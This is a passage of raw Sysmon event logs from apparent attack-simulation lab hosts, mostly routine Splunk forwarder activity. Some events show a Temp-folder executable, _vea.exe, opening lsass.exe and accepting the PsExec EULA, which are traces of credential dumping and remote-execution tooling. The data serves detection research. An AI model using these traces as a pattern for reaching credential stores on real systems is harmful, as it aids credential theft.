23542300x8000000000000000293598Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.712{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20FAFABDFD6DF5FE4A47B274F5888686,SHA256=E399524EBBE6E0F5FDD704CDF0B4A59B89387D850F1E93DE3FE0824918CB39FA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293597Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.690{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1373-6216-6806-000000003802}3356C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293596Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:59.690{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1373-6216-6806-000000003802}3356C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000293595Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:58:59.690{C8EA50B7-1373-6216-6906-000000003802}5208C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 23542300x8000000000000000293615Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:01.741{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D6C1B7CB0F66DAD054EF945A2415ECC,SHA256=25AC0E79A2683807EFB88E8F279C8FBBAB027D99F1F5F4927A7B15FFB0762DAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218121Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:01.457{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AAAE002BE1B2BB37514F7603F38F31C,SHA256=11948A0A96DDB3A0742CAF97979D1BF3E6247632CC7CA560D81667B8D6FD5A62,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293614Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:01.449{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1375-6216-6C06-000000003802}6744C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293613Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:01.449{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293612Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:01.449{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293611Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:01.449{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293610Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:01.449{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293609Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:01.449{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1375-6216-6C06-000000003802}6744C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293608Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:01.449{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1375-6216-6C06-000000003802}6744C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000293607Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:01.451{C8EA50B7-1375-6216-6C06-000000003802}6744C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000293625Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:02.748{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA9DFED419E30F39982FB4987A77CE5B,SHA256=1436B9DB405727B7A9CD465892114D8F5545AD19703DBD245760E355C15A6BFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218122Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:02.473{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E5771B9F6DADB91F083B1F725B47541,SHA256=EF22929491056AB9EC8541097CEC8FCAAA4CD7F35154CA9B1ABDBAC3ADB980CD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293624Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:02.463{C8EA50B7-1376-6216-6D06-000000003802}10126244C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293623Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:02.139{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1376-6216-6D06-000000003802}1012C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293622Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:02.129{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293621Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:02.129{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293620Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:02.129{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293619Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:02.128{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1376-6216-6D06-000000003802}1012C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293618Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:02.128{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293617Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:02.127{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1376-6216-6D06-000000003802}1012C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000293616Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:02.126{C8EA50B7-1376-6216-6D06-000000003802}1012C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218123Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:03.504{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A748890C8F61DB30799C4345BEBABB90,SHA256=54473309DFB90C41A0E4FB26AC4431017580A545E4282EF2ECCE5281C4F3E373,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293627Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:03.748{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12AD9E5A3CDBF39B2BE30AC44A3D0251,SHA256=17E919CF3ADCDE780EA7AFD8DAEDB795FB61E3B5EC47A06A1257F8BBC613FB07,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293626Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:00.386{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local52124- 23542300x8000000000000000293637Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:04.749{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38848372E668A47F36CB922DEA616DD8,SHA256=6B6717445022BA3328BC442B0D351C15A9ADBFC281A5BC3CA58CB6B9B3DFCA60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218125Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:04.519{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BBE197C364C5EAFE0334CE258251CAB,SHA256=73E2AF8BEB14F09A87997144BB84ADC0F006D253C53151BC9E154AB4AFC5FD68,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218124Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:01.546{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51438-false10.0.1.12-8000- 10341000x8000000000000000293636Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:04.217{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1378-6216-6E06-000000003802}1016C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293635Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:04.201{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293634Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 